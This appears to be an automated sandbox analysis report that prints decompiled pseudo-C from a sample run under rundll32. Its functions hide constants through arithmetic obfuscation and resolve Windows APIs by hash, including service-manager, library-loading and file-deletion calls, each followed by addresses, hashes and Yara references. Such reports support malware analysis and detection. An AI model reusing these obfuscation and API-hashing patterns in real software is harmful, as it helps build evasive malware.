                                                                      			E0200340E(void* __ecx, void* __edx, int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				intOrPtr _v28;
				void* _t45;
				void* _t57;
				signed int _t59;
				signed int _t60;

				_push(_a12);
				_push(0);
				_push(0);
				E02002550(_t45);
				_v28 = 0x755cc3;
				_v24 = 0;
				_v20 = 0xc93f;
				_v20 = _v20 >> 3;
				_t59 = 0x1a;
				_v20 = _v20 / _t59;
				_v20 = _v20 ^ 0x00003660;
				_v16 = 0x16ad;
				_v16 = _v16 + 0x57a7;
				_v16 = _v16 | 0xbe0b763b;
				_v16 = _v16 ^ 0xbe0b2e9f;
				_v12 = 0xa207;
				_v12 = _v12 + 0xb6;
				_t60 = 0x37;
				_v12 = _v12 * 0x38;
				_v12 = _v12 ^ 0x0023dbd3;
				_v8 = 0xebb1;
				_v8 = _v8 / _t60;
				_v8 = _v8 | 0x19ad118e;
				_v8 = _v8 ^ 0x19ad0924;
				E01FF7378(_t60, 0x3e7f6fd6, _t60, 0x2daf77dd, 0x231);
				_t57 = OpenSCManagerW(0, 0, _a12); // executed
				return _t57;
			}













                                                                      0x02003415
                                                                      0x0200341a
                                                                      0x0200341b
                                                                      0x0200341e
                                                                      0x02003423
                                                                      0x0200342d
                                                                      0x02003432
                                                                      0x02003439
                                                                      0x02003442
                                                                      0x02003447
                                                                      0x0200344c
                                                                      0x02003453
                                                                      0x0200345a
                                                                      0x02003461
                                                                      0x02003468
                                                                      0x0200346f
                                                                      0x02003476
                                                                      0x02003481
                                                                      0x0200348d
                                                                      0x02003490
                                                                      0x02003497
                                                                      0x020034a8
                                                                      0x020034ab
                                                                      0x020034b2
                                                                      0x020034c6
                                                                      0x020034d3
                                                                      0x020034d9

                                                                      APIs
                                                                      • OpenSCManagerW.SECHOST(00000000,00000000,00003660,?,?,?,?,?,?,?,?,?,B0D9BF73), ref: 020034D3
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000008.00000002.2091882059.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.2091891119.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ManagerOpen
                                                                      • String ID:
                                                                      • API String ID: 1889721586-0
                                                                      • Opcode ID: c0ae0e58ecd35d2b9c62b79812254f01c588eabc6ff7d27383c4dcafa84254bd
                                                                      • Instruction ID: c449c0e66c87d08424e8c80836b5017f9d1a244730bdf41b66408f2ba1d5ab92
                                                                      • Opcode Fuzzy Hash: c0ae0e58ecd35d2b9c62b79812254f01c588eabc6ff7d27383c4dcafa84254bd
                                                                      • Instruction Fuzzy Hash: E62104B1D01319ABEB04DFA9C84A8DFBBB5FB10314F10818AE414AA280D3B55B148B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02000321, Relevance: 1.6, APIs: 1, Instructions: 59serviceCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 79%
                                                                      			E02000321(void* __ecx, int __edx, intOrPtr _a4, intOrPtr _a8, short* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t44;
				void* _t56;
				void* _t59;
				int _t60;

				_push(_a12);
				_t60 = __edx;
				_t59 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02002550(_t44);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xc39a9;
				_v20 = 0xd5ea;
				_v20 = _v20 | 0xff6e49b2;
				_v20 = _v20 << 1;
				_v20 = _v20 ^ 0xfeddf181;
				_v12 = 0x5ebb;
				_v12 = _v12 * 0x36;
				_v12 = _v12 * 0x4e;
				_v12 = _v12 | 0x0415626f;
				_v12 = _v12 ^ 0x0617d8e0;
				_v16 = 0xb467;
				_v16 = _v16 << 4;
				_v16 = _v16 * 0x58;
				_v16 = _v16 ^ 0x03e03a17;
				_v8 = 0xc80e;
				_v8 = _v8 * 5;
				_v8 = _v8 * 0x5d;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x000b2851;
				E01FF7378(__ecx, 0x612723fe, __ecx, 0x2daf77dd, 0x10e);
				_t56 = OpenServiceW(_t59, _a12, _t60); // executed
				return _t56;
			}













                                                                      0x02000329
                                                                      0x0200032c
                                                                      0x0200032e
                                                                      0x02000330
                                                                      0x02000333
                                                                      0x02000336
                                                                      0x02000337
                                                                      0x02000338
                                                                      0x0200033d
                                                                      0x02000344
                                                                      0x0200034b
                                                                      0x02000352
                                                                      0x02000359
                                                                      0x0200035c
                                                                      0x02000363
                                                                      0x0200037e
                                                                      0x02000386
                                                                      0x02000389
                                                                      0x02000390
                                                                      0x02000397
                                                                      0x0200039e
                                                                      0x020003a6
                                                                      0x020003a9
                                                                      0x020003b0
                                                                      0x020003bb
                                                                      0x020003c2
                                                                      0x020003c5
                                                                      0x020003c9
                                                                      0x020003dc
                                                                      0x020003e9
                                                                      0x020003f0

                                                                      APIs
                                                                      • OpenServiceW.SECHOST(?,FEDDF181,B0D9BF73,?,?,?,?,?,?,?,?,00000000,B0D9BF73), ref: 020003E9
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000008.00000002.2091882059.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.2091891119.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: OpenService
                                                                      • String ID:
                                                                      • API String ID: 3098006287-0
                                                                      • Opcode ID: 0746f5dc7b9730f7e3e73603d11b48040c955b65539017cf6c6302df4382ab22
                                                                      • Instruction ID: 0c5e7d6929d7acab19da5c2012ebab23d200f6429f8ef3e518442dd321af55d4
                                                                      • Opcode Fuzzy Hash: 0746f5dc7b9730f7e3e73603d11b48040c955b65539017cf6c6302df4382ab22
                                                                      • Instruction Fuzzy Hash: F621DFB1C01219BBDB14DFA5C98A8DEBFB4EB45304F108199E825B6260D3B49B54DF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 020049CF, Relevance: 1.6, APIs: 1, Instructions: 58libraryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 95%
                                                                      			E020049CF(void* __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t52;
				struct HINSTANCE__* _t65;
				signed int _t67;
				signed int _t68;
				signed int _t69;

				_push(_a4);
				E02002550(_t52);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x2e62bd;
				_v12 = 0x9175;
				_v12 = _v12 >> 3;
				_v12 = _v12 >> 4;
				_t67 = 0x72;
				_v12 = _v12 / _t67;
				_v12 = _v12 ^ 0x00007d95;
				_v20 = 0x6b8f;
				_v20 = _v20 + 0xab5d;
				_v20 = _v20 ^ 0x000118a2;
				_v16 = 0x74fd;
				_v16 = _v16 + 0xb2f4;
				_v16 = _v16 | 0x45835894;
				_v16 = _v16 ^ 0x45831718;
				_v8 = 0x475a;
				_t68 = 0x1a;
				_v8 = _v8 / _t68;
				_t69 = 0x71;
				_v8 = _v8 / _t69;
				_v8 = _v8 | 0x9a1a6af5;
				_v8 = _v8 ^ 0x9a1a601d;
				E01FF7378(_t69, 0xd3779e90, _t69, 0x90f109b3, 0xd8);
				_t65 = LoadLibraryW(_a4); // executed
				return _t65;
			}














                                                                      0x020049d5
                                                                      0x020049da
                                                                      0x020049df
                                                                      0x020049e6
                                                                      0x020049ef
                                                                      0x020049f6
                                                                      0x020049fa
                                                                      0x02004a03
                                                                      0x02004a08
                                                                      0x02004a0d
                                                                      0x02004a14
                                                                      0x02004a1b
                                                                      0x02004a22
                                                                      0x02004a29
                                                                      0x02004a30
                                                                      0x02004a37
                                                                      0x02004a3e
                                                                      0x02004a45
                                                                      0x02004a4f
                                                                      0x02004a54
                                                                      0x02004a5c
                                                                      0x02004a64
                                                                      0x02004a67
                                                                      0x02004a6e
                                                                      0x02004a8d
                                                                      0x02004a98
                                                                      0x02004a9d

                                                                      APIs
                                                                      • LoadLibraryW.KERNEL32(00007D95), ref: 02004A98
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000008.00000002.2091882059.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.2091891119.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: c29722005f0625fdf4ec6d3b097d6093e6e9b8b9e5bc80068fdeaf8eb8cc74df
                                                                      • Instruction ID: a0a9525f366297be9205ec55cd22178dac784b83630e065956c3217af9c09b35
                                                                      • Opcode Fuzzy Hash: c29722005f0625fdf4ec6d3b097d6093e6e9b8b9e5bc80068fdeaf8eb8cc74df
                                                                      • Instruction Fuzzy Hash: F62118B5E00208FBEB04CFA5C95A5EEBBB1EB50304F10C099E518A7290D7B56B549B50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 020041CA, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 58%
                                                                      			E020041CA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t42;
				intOrPtr* _t50;
				void* _t51;
				signed int _t53;
				void* _t57;

				_t57 = __ecx;
				E02002550(_t42);
				_v20 = 0x33dd;
				_t53 = 0x60;
				_v20 = _v20 / _t53;
				_v20 = _v20 ^ 0x0000445b;
				_v8 = 0x98b2;
				_v8 = _v8 << 0xa;
				_v8 = _v8 | 0x9f0dae98;
				_v8 = _v8 + 0xffff2dd8;
				_v8 = _v8 ^ 0x9f6f2800;
				_v16 = 0x7a4d;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x630ec107;
				_v16 = _v16 ^ 0x6301fd0c;
				_v12 = 0xd3a1;
				_v12 = _v12 ^ 0x9b5a4994;
				_v12 = _v12 + 0xffffbec0;
				_v12 = _v12 ^ 0x9b5a0da8;
				_t50 = E01FF7378(_t53, 0x7c314b7f, _t53, 0x90f109b3, 0x1d9);
				_t51 =  *_t50(_t57, 0, _a12, 0x28, __ecx, __edx, _a4, _a8, _a12, 0, _a20, 0x28); // executed
				return _t51;
			}












                                                                      0x020041d6
                                                                      0x020041e5
                                                                      0x020041ea
                                                                      0x020041fb
                                                                      0x02004203
                                                                      0x02004206
                                                                      0x0200420d
                                                                      0x02004214
                                                                      0x02004218
                                                                      0x0200421f
                                                                      0x02004226
                                                                      0x0200422d
                                                                      0x02004234
                                                                      0x02004238
                                                                      0x0200423f
                                                                      0x02004246
                                                                      0x0200424d
                                                                      0x02004254
                                                                      0x0200425b
                                                                      0x0200427a
                                                                      0x0200428a
                                                                      0x02004290

                                                                      APIs
                                                                      • SetFileInformationByHandle.KERNELBASE(0026A181,00000000,0000445B,00000028), ref: 0200428A
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000008.00000002.2091882059.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.2091891119.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileHandleInformation
                                                                      • String ID:
                                                                      • API String ID: 3935143524-0
                                                                      • Opcode ID: c542c3b5640c0f18f6fd6ea0d0e2ab16144babf3d8c5a3537028e32b44421a17
                                                                      • Instruction ID: 7edeb9d79b06b18bdf915a4914c6a59fc09bfabe6e9d4367b1f69e9e0fc0edb3
                                                                      • Opcode Fuzzy Hash: c542c3b5640c0f18f6fd6ea0d0e2ab16144babf3d8c5a3537028e32b44421a17
                                                                      • Instruction Fuzzy Hash: A5115C72E00319BFEB04DFE4CC4AAEEBBB5EF44710F108188E924662A0D7B55B109F80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FF5AB8, Relevance: 1.6, APIs: 1, Instructions: 51serviceCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 86%
                                                                      			E01FF5AB8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t47;
				int _t57;
				signed int _t59;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E02002550(_t47);
				_v20 = 0xc8c;
				_v20 = _v20 + 0xffffaa04;
				_v20 = _v20 ^ 0xb702763d;
				_v20 = _v20 ^ 0x48fdd1a6;
				_v16 = 0xeb1c;
				_v16 = _v16 << 4;
				_t59 = 0xf;
				_v16 = _v16 * 0xe;
				_v16 = _v16 + 0xffff64c4;
				_v16 = _v16 ^ 0x00cd6bec;
				_v12 = 0x757;
				_v12 = _v12 ^ 0x4183b2e4;
				_v12 = _v12 << 2;
				_v12 = _v12 / _t59;
				_v12 = _v12 ^ 0x0067440e;
				_v8 = 0xa082;
				_v8 = _v8 >> 1;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0xcec43627;
				_v8 = _v8 ^ 0xcec45939;
				E01FF7378(_t59, 0x114af6f7, _t59, 0x2daf77dd, 0x11f);
				_t57 = CloseServiceHandle(_a12); // executed
				return _t57;
			}










                                                                      0x01ff5abe
                                                                      0x01ff5ac1
                                                                      0x01ff5ac4
                                                                      0x01ff5ac9
                                                                      0x01ff5ace
                                                                      0x01ff5ad8
                                                                      0x01ff5ae1
                                                                      0x01ff5ae8
                                                                      0x01ff5aef
                                                                      0x01ff5af6
                                                                      0x01ff5b00
                                                                      0x01ff5b0b
                                                                      0x01ff5b0e
                                                                      0x01ff5b15
                                                                      0x01ff5b1c
                                                                      0x01ff5b23
                                                                      0x01ff5b2a
                                                                      0x01ff5b34
                                                                      0x01ff5b37
                                                                      0x01ff5b3e
                                                                      0x01ff5b45
                                                                      0x01ff5b48
                                                                      0x01ff5b4c
                                                                      0x01ff5b53
                                                                      0x01ff5b6c
                                                                      0x01ff5b77
                                                                      0x01ff5b7c

                                                                      APIs
                                                                      • CloseServiceHandle.SECHOST(48FDD1A6), ref: 01FF5B77
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000008.00000002.2091882059.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.2091891119.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseHandleService
                                                                      • String ID:
                                                                      • API String ID: 1725840886-0
                                                                      • Opcode ID: f4cf61d19d0f0e03d476cf6393de878d7bbf839847225a23a7b5c25768a7d686
                                                                      • Instruction ID: 902f9cdb0904f8c03d54b135100134bc4aea96dd76305c0a38a79d325756e018
                                                                      • Opcode Fuzzy Hash: f4cf61d19d0f0e03d476cf6393de878d7bbf839847225a23a7b5c25768a7d686
                                                                      • Instruction Fuzzy Hash: DA110371D0020DFFDB08DFA9C94A8EEBBB0FB40304F108599E925A6290D7BA9B15DF44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FFE554, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 90%
                                                                      			E01FFE554(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t42;
				int _t51;
				signed int _t53;
				struct _SHFILEOPSTRUCTW* _t57;

				_push(_a4);
				_t57 = __edx;
				_push(__edx);
				E02002550(_t42);
				_v20 = 0xead4;
				_v20 = _v20 + 0xffff9be4;
				_v20 = _v20 ^ 0x000085bc;
				_v16 = 0x46f7;
				_v16 = _v16 << 0xe;
				_v16 = _v16 << 7;
				_t53 = 0x39;
				_v16 = _v16 / _t53;
				_v16 = _v16 ^ 0x03e8aab4;
				_v12 = 0x2beb;
				_v12 = _v12 ^ 0xafae01c3;
				_v12 = _v12 + 0xffff58eb;
				_v12 = _v12 ^ 0xa5118136;
				_v12 = _v12 ^ 0x0abc415f;
				_v8 = 0xa691;
				_v8 = _v8 ^ 0x7591c523;
				_v8 = _v8 << 0xa;
				_v8 = _v8 + 0x20df;
				_v8 = _v8 ^ 0x458ea297;
				E01FF7378(_t53, 0x11ef7293, _t53, 0xd20b8aa4, 0x23a);
				_t51 = SHFileOperationW(_t57); // executed
				return _t51;
			}











                                                                      0x01ffe55b
                                                                      0x01ffe55e
                                                                      0x01ffe560
                                                                      0x01ffe562
                                                                      0x01ffe567
                                                                      0x01ffe571
                                                                      0x01ffe57a
                                                                      0x01ffe581
                                                                      0x01ffe588
                                                                      0x01ffe58c
                                                                      0x01ffe595
                                                                      0x01ffe59d
                                                                      0x01ffe5a0
                                                                      0x01ffe5a7
                                                                      0x01ffe5ae
                                                                      0x01ffe5b5
                                                                      0x01ffe5bc
                                                                      0x01ffe5c3
                                                                      0x01ffe5ca
                                                                      0x01ffe5d1
                                                                      0x01ffe5d8
                                                                      0x01ffe5dc
                                                                      0x01ffe5e3
                                                                      0x01ffe602
                                                                      0x01ffe60b
                                                                      0x01ffe611

                                                                      APIs
                                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?,?,?,?), ref: 01FFE60B
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000008.00000002.2091882059.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.2091891119.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileOperation
                                                                      • String ID:
                                                                      • API String ID: 3080627654-0
                                                                      • Opcode ID: a2bec794df76323023851c9be7ee8809eaedd15e8b0fb47450a564a3f094c509
                                                                      • Instruction ID: 2e6199d4ae5fc3de9b6a8e90e145e878610145325f5de81443239b371fc658fd
                                                                      • Opcode Fuzzy Hash: a2bec794df76323023851c9be7ee8809eaedd15e8b0fb47450a564a3f094c509
                                                                      • Instruction Fuzzy Hash: 781123B1D01318BBEB18DFA4C8498DEBBB4FF00718F108698E82576250D3B95B44DF80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FFEB1E, Relevance: 1.5, APIs: 1, Instructions: 43fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 82%
                                                                      			E01FFEB1E(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t34;
				int _t44;

				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E02002550(_t34);
				_v8 = 0xd1b2;
				_v8 = _v8 * 0x63;
				_v8 = _v8 << 4;
				_v8 = _v8 * 0x74;
				_v8 = _v8 ^ 0x4bec8e88;
				_v20 = 0x1fc5;
				_v20 = _v20 + 0x9c84;
				_v20 = _v20 ^ 0x0000b099;
				_v16 = 0x542c;
				_v16 = _v16 | 0x3ba7d0a3;
				_v16 = _v16 ^ 0x3ba7e6ce;
				_v12 = 0x8319;
				_v12 = _v12 * 0x45;
				_v12 = _v12 + 0xffff39a4;
				_v12 = _v12 ^ 0x0022b84c;
				E01FF7378(__ecx, 0x497c0ce2, __ecx, 0x90f109b3, 0x28d);
				_t44 = DeleteFileW(_a8); // executed
				return _t44;
			}









                                                                      0x01ffeb24
                                                                      0x01ffeb27
                                                                      0x01ffeb2b
                                                                      0x01ffeb2c
                                                                      0x01ffeb31
                                                                      0x01ffeb49
                                                                      0x01ffeb4c
                                                                      0x01ffeb5b
                                                                      0x01ffeb5e
                                                                      0x01ffeb65
                                                                      0x01ffeb6c
                                                                      0x01ffeb73
                                                                      0x01ffeb7a
                                                                      0x01ffeb81
                                                                      0x01ffeb88
                                                                      0x01ffeb8f
                                                                      0x01ffeb9a
                                                                      0x01ffeb9d
                                                                      0x01ffeba4
                                                                      0x01ffebb7
                                                                      0x01ffebc2
                                                                      0x01ffebc7

                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(3BA7E6CE), ref: 01FFEBC2
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000008.00000002.2091882059.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.2091891119.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0
                                                                      • Opcode ID: 5b5a61d3999058f75d5056704f6b95223429b9c5b7b3188806985cdc6256b9e5
                                                                      • Instruction ID: 0837fdfe1ff4a7f1d0ba16b912b85ac3b839edb68c45034b4e407f0f3a21c036
                                                                      • Opcode Fuzzy Hash: 5b5a61d3999058f75d5056704f6b95223429b9c5b7b3188806985cdc6256b9e5
                                                                      • Instruction Fuzzy Hash: 3911E3B1C0020DFBDF04DFE4DA4689EBBB4FF40314F608589E914A62A1D7759B549F90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FFF1ED, Relevance: 1.3, APIs: 1, Instructions: 53COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 85%
                                                                      			E01FFF1ED(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t46;
				int _t57;
				signed int _t59;
				signed int _t60;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E02002550(_t46);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x28beb0;
				_v16 = 0xe97b;
				_v16 = _v16 >> 3;
				_t59 = 0x47;
				_v16 = _v16 / _t59;
				_v16 = _v16 ^ 0x00001a39;
				_v12 = 0x2d01;
				_v12 = _v12 >> 8;
				_t60 = 0x3a;
				_v12 = _v12 / _t60;
				_v12 = _v12 ^ 0x000023d3;
				_v20 = 0xc5d9;
				_v20 = _v20 | 0x3e7a6da8;
				_v20 = _v20 ^ 0x3e7ad9f3;
				_v8 = 0x3ddd;
				_v8 = _v8 >> 7;
				_v8 = _v8 + 0xffffadd9;
				_v8 = _v8 ^ 0xffff8e91;
				E01FF7378(_t60, 0x171b6692, _t60, 0x90f109b3, 0x219);
				_t57 = CloseHandle(_a12); // executed
				return _t57;
			}













                                                                      0x01fff1f3
                                                                      0x01fff1f6
                                                                      0x01fff1f9
                                                                      0x01fff1fe
                                                                      0x01fff203
                                                                      0x01fff20a
                                                                      0x01fff213
                                                                      0x01fff21a
                                                                      0x01fff223
                                                                      0x01fff228
                                                                      0x01fff22d
                                                                      0x01fff234
                                                                      0x01fff23b
                                                                      0x01fff242
                                                                      0x01fff24a
                                                                      0x01fff24d
                                                                      0x01fff254
                                                                      0x01fff25b
                                                                      0x01fff262
                                                                      0x01fff269
                                                                      0x01fff270
                                                                      0x01fff274
                                                                      0x01fff27b
                                                                      0x01fff29a
                                                                      0x01fff2a5
                                                                      0x01fff2aa

                                                                      APIs
                                                                      • CloseHandle.KERNEL32(3E7AD9F3), ref: 01FFF2A5
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000008.00000002.2091882059.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.2091891119.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: cf10afad277e2012e22543214ce3650eca193848e4e18c4a52ea8fe530b3ff63
                                                                      • Instruction ID: 353913d418cf77cba58a7defb6135635256298b91c9fffab0dc278bfcdf3311a
                                                                      • Opcode Fuzzy Hash: cf10afad277e2012e22543214ce3650eca193848e4e18c4a52ea8fe530b3ff63
                                                                      • Instruction Fuzzy Hash: 031117B6D0020CEBDF05DFE5C84A9DEBBB5EB14304F108589E91466290D3B55B649F40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 02018330, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetMonitorInfoA.USER32(?,?), ref: 02018361
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0201839D
                                                                      • GetSystemMetrics.USER32(00000001), ref: 020183A8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091897413.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$InfoMonitor
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfo
                                                                      • API String ID: 4250584380-1428758730
                                                                      • Opcode ID: 04ecff48eb234fbf3e31fa29dd6e888e1bdf158b5b699fe09ba5ccffcadb1a70
                                                                      • Instruction ID: 2fb8abeafbd25850d1847d23ab74e2b26dd189ce7a5ab291e14a27953b2249ff
                                                                      • Opcode Fuzzy Hash: 04ecff48eb234fbf3e31fa29dd6e888e1bdf158b5b699fe09ba5ccffcadb1a70
                                                                      • Instruction Fuzzy Hash: 7B110371A413159FE320CF609C847BBB7EDFB05720F448A29ED46D7240D7B1A600DBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 020185AC, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnumDisplayMonitors.USER32(?,?,?,?), ref: 020185E5
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0201860A
                                                                      • GetSystemMetrics.USER32(00000001), ref: 02018615
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091897413.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$DisplayEnumMonitors
                                                                      • String ID: /}Au$EnumDisplayMonitors
                                                                      • API String ID: 1389147845-1105134141
                                                                      • Opcode ID: e916b40d8c21c532d867f37bf6451a2c264770f2f704c1860e8ef2cb609d3ca1
                                                                      • Instruction ID: 05f922c5d4f62aca0f968dade12ba72a9507ded5927094e839d6e41cdf198bef
                                                                      • Opcode Fuzzy Hash: e916b40d8c21c532d867f37bf6451a2c264770f2f704c1860e8ef2cb609d3ca1
                                                                      • Instruction Fuzzy Hash: 4931FEB2E0131AAFEB51DEA4CC84AEF77FCAF55215F008526E915E3200EB75D610DBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02018404, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 02018471
                                                                      • GetSystemMetrics.USER32(00000001), ref: 0201847C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091897413.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoA
                                                                      • API String ID: 4116985748-2822609925
                                                                      • Opcode ID: 0e6a36dae21ebd5b78141f6f29f64b2e7d677f04e87f62cef80a44966c84fe99
                                                                      • Instruction ID: 24fd07a7333b2c82ede915911725371fce972d7bb34ee27942c3877f1b224a10
                                                                      • Opcode Fuzzy Hash: 0e6a36dae21ebd5b78141f6f29f64b2e7d677f04e87f62cef80a44966c84fe99
